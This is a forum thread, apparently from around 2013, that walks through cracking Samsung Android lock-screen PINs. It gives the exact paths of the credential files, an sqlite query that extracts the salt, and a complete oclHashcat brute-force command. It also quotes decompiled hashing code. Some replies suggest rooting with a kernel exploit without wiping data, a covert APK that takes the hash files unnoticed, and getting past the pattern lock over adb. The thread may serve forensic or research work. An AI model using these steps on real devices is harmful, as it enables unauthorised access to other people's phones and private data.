Breaking Samsung Android Passwords/PIN
#1
Step 1 : Get access to the data files

Step 2 : Get following files from the device :
"/data/system/password.key"
"/data/data/com.android.providers.settings/databases/settings.db"

Step 3 : Extract hash from password.key
example : "941d4637d8223d958d7f2324572c7e319dcea01f"

Step 4 : Extract seed from settings.db (using sqlite3 tool)
command: "sqlite3 settings.db"
>"SELECT lockscreen.password_salt from secure;"
example : "-660806340342588628"
convert to lowercase hex : "f6d45822728ddb2c"

Step 5 : use oclhashcat to bruteforce (in this case we know length and type of password : 8 digits and decimals only) :
"./oclHashcat-plus64.bin -a 3 -n 80 -u 1024 -m 5800 941d4637d8223d958d7f2324572c7e319dcea01f:f6d45822728ddb2c ?d?d?d?d?d?d?d?d"

Done.

How it works :
SHA1 is being used with 1024 iterations

Step 0 : Iteration in Ascii + Password + Seed => SHA1 Hash
Example using pwd "test" : 0testf6d45822728ddb2c

Step 1 till 1023 : SHA1-Hash of previous round + Iteration in Ascii + Password + Seed => SHA1 Hash
Example : {previous sha1 hash in binary}1testf6d45822728ddb2c
...
{previous sha1 hash in binary}1023testf6d45822728ddb2c

Algorithm can be reversed from libsec.ko or framework2.odex

Resulting hash is the hash from password.key

framework2 relevant source code :
Code:
public byte[] passwordToHash(String paramString)
  {
    if (paramString == null)
      return null;
    String str = null;
    byte[] arrayOfByte1 = null;
    try
    {
      byte[] arrayOfByte2 = (paramString + getSalt()).getBytes();
      byte[] arrayOfByte3 = null;
      str = "SHA-1";
      MessageDigest localMessageDigest = MessageDigest.getInstance(str);
      long l1 = System.currentTimeMillis();
      for (int i = 0; i < 1024; i++)
      {
        arrayOfByte1 = null;
        if (arrayOfByte3 != null)
          localMessageDigest.update(arrayOfByte3);
        localMessageDigest.update(("" + i).getBytes());
        localMessageDigest.update(arrayOfByte2);
        arrayOfByte3 = localMessageDigest.digest();
      }
      arrayOfByte1 = toHex(arrayOfByte3).getBytes();
      long l2 = System.currentTimeMillis();
      Log.w("LockPatternUtils", "passwordToHash time = " + (l2 - l1) + "ms");
      return arrayOfByte1;
    }
    catch (NoSuchAlgorithmException localNoSuchAlgorithmException)
    {
      Log.w("LockPatternUtils", "Failed to encode string because of missing algorithm: " + str);
    }
    return arrayOfByte1;
  }
#2
well done Smile
#3
Hm, how do you practically extract that? I am trying to extract it from Samsung Galaxy S3. Of course /data/data and /data/system are not readable by the adb user and it would require to root the phone. But then we have one problem: even if USB debugging is enabled, you can't connect to the phone while locked to upload the new image. Another problem is that you might be required to unlock the bootloader (haven't done that so not 100% sure) which according to what I read will erase user data including the hashes.

Please correct me if I am wrong.
#4
(04-04-2013, 12:22 PM)gat3way Wrote: Hm, how do you practically extract that? I am trying to extract it from Samsung Galaxy S3. Of course /data/data and /data/system are not readable by the adb user and it would require to root the phone. But then we have one problem: even if USB debugging is enabled, you can't connect to the phone while locked to upload the new image. Another problem is that you might be required to unlock the bootloader (haven't done that so not 100% sure) which according to what I read will erase user data including the hashes.

Please correct me if I am wrong.

It is possible to root without unlocking boot loader therefore you won't lose any data, works on unpatched samsung devices see the Exynos Kernel Exploit linked below

http://forum.xda-developers.com/showthre...?t=2050297

another method

http://forum.xda-developers.com/showthre...?t=1894717

You could possibly craft an APK which obviously will require root privileges allowing you to grab the data. Won't exactly be 'undetected' if the user already has a rooted phone, if the phone can be exploited then you could probably make it undetectable.
#5
That would work in case you have the phone unlocked (in the sense of PIN already entered and not related to bootloader). Still if it is locked, you shouldn't be able to upload anything via adb. I guess one possibility would be to install one of those pin unlock apps (which do not require root) and reboot, still that would require the google play account and the phone being connected to the internet at that time. But yes, that makes sense for PIN recovery - then you can root the phone and proceed.

BTW is there some screen lock bypass trick for Samsung S3 ? I've seen such from time to time...not for s3 as far as I remember...
#6
Phone with pin/pattern still answers to adb, so you can bypass pattern lock. About root for S3 - if it enters bootloader then you simply write any root package by odin.

hint: http://forum.xda-developers.com/showthre...?t=1695238
#7
Had ~30 min of headache thinking where I saw similar name like on theme authors nick. It's really interesting to see you here.
#8
The same works for Nexus 7, but there is a difference, the lockscreen.password_salt is not located in /data/data/com.android.providers.settings/databases/settings.db, but rather in /data/system/locksettings.db, table is locksettings.

P.S correction, Nexus 7 works the old way (just salted sha1/md5) so indeed that's Samsung-specific. Apparently I had bug in my script to validate the algo.
#9
Thanks, Milen!
#10
(04-04-2013, 11:01 AM)bkerler Wrote: Step 5 : use oclhashcat to bruteforce (in this case we know length and type of password : 8 digits and decimals only) :
"./oclHashcat-plus64.bin -a 3 -n 80 -u 1024 -m 5800 941d4637d8223d958d7f2324572c7e319dcea01f:f6d45822728ddb2c ?d?d?d?d?d?d?d?d"

What version did you use?

I used the v0.14 and it does not have the hash type 5800? Where did you get a version with that type?

This is what I get on my testing:
Code:
D:\Downloads\oclHashcat-plus-0.14>oclHashcat-plus64.exe -a 3
-n 80 -u 1024 -m 5800 21faa15e0409fa961f0c2b2e8e2fde96cfe4a9e53bf54dbf16c58965f
93bf164a6612c38:636bb8161c861503 ?d?d?d?d?d
Invalid --hash-type specified

Thanks for the info in advanced!